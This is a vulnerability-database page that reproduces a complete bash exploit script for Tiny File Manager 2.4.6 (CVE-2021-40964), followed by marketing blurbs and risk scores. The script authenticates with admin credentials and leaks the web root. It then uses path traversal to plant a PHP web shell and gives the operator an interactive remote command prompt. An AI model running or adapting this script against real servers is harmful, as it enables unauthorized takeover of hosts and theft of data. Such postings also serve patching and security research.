Lucene search
K

Tiny File Manager 2.4.6 - Remote Code Execution Exploit

🗓️ 16 Mar 2022 00:00:00Reported by FEBIN MON SAJIType 
zdt
 zdt
🔗 0day.today👁 407 Views

Tiny File Manager 2.4.6 - Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Tiny_File_Manager_Project Tiny_File_Manager
20 Dec 202200:47
githubexploit
GithubExploit
Exploit for Path Traversal in Tiny_File_Manager_Project Tiny_File_Manager
18 Mar 202214:00
githubexploit
GithubExploit
Exploit for Path Traversal in Tiny_File_Manager_Project Tiny_File_Manager
13 Mar 202318:40
githubexploit
GithubExploit
Exploit for Path Traversal in Tinyfilemanager_Project Tinyfilemanager
27 Dec 202506:45
githubexploit
ATTACKERKB
CVE-2021-45010
15 Mar 202212:15
attackerkb
ATTACKERKB
CVE-2021-40964
15 Sep 202118:15
attackerkb
Circl
CVE-2021-40964
15 Sep 202122:22
circl
Circl
CVE-2021-45010
15 Mar 202215:19
circl
CNNVD
TinyFileManager 路径遍历漏洞
15 Sep 202100:00
cnnvd
CNNVD
Tiny File Manager路径遍历漏洞
15 Mar 202200:00
cnnvd
Rows per page
# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
# Exploit Author: FEBIN MON SAJI
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <= 2.4.6
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-40964
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/

#!/bin/bash

check(){

which curl
if  [ $? = 0 ]
then
printf "[✔] Curl found! \n"
else
printf "[❌] Curl not found! \n"
exit
fi

which jq
if  [ $? = 0 ]
then
printf "[✔] jq found! \n"
else
printf "[❌] jq not found! \n"
exit
fi
}
usage(){

printf "
TIny File Manager Authenticated RCE Exploit.

By FEBIN

$0 <URL> <Admin Username> <Password>

Example: $0 http://files.ubuntu.local/index.php admin \"[email protected]\"

"
}

log-in(){
URL=$1
admin=$2
pass=$3
cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)

if [ $cookie ]
then
printf "\n[+]  Login Success! Cookie: $cookie \n"
else
printf "\n[-] Logn Failed! \n"
fi

URL=${URL}
}

find_webroot(){


webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )


if [ $webroot ]
then
printf "\n[*] Try to Leak Web root directory path \n\n"
printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" 
else
printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
webroot="/var/www/html"
fi
}

upload(){

#webroot="/var/www/tiny/"
shell="shell$RANDOM.php"
echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell



curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "[email protected]/tmp/$shell" | grep "successful"


}

exploit(){

WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")

upload


if [ $? = 0 ]
then
printf "[+] File Upload Successful! \n"
else
printf "[-] File Upload Unsuccessful! Exiting! \n"
exit 1
fi


printf "[+] Checking for the shell \n"


curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
if [ $? = 0 ]
then
printf "[+] Shell found ${WEB_URL}/$shell \n"
else 
printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
exit 2
fi

printf "[+] Getting shell access! \n\n"

while true
do
printf "$> "
read cmd
curl  ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
done
}

if [ $1 ] && [ $2 ] && [ $3 ]
then
check
log-in $1 $2 $3

find_webroot


exploit
else
usage
fi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2022 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 26.5
CVSS 3.18.8
EPSS0.7008
407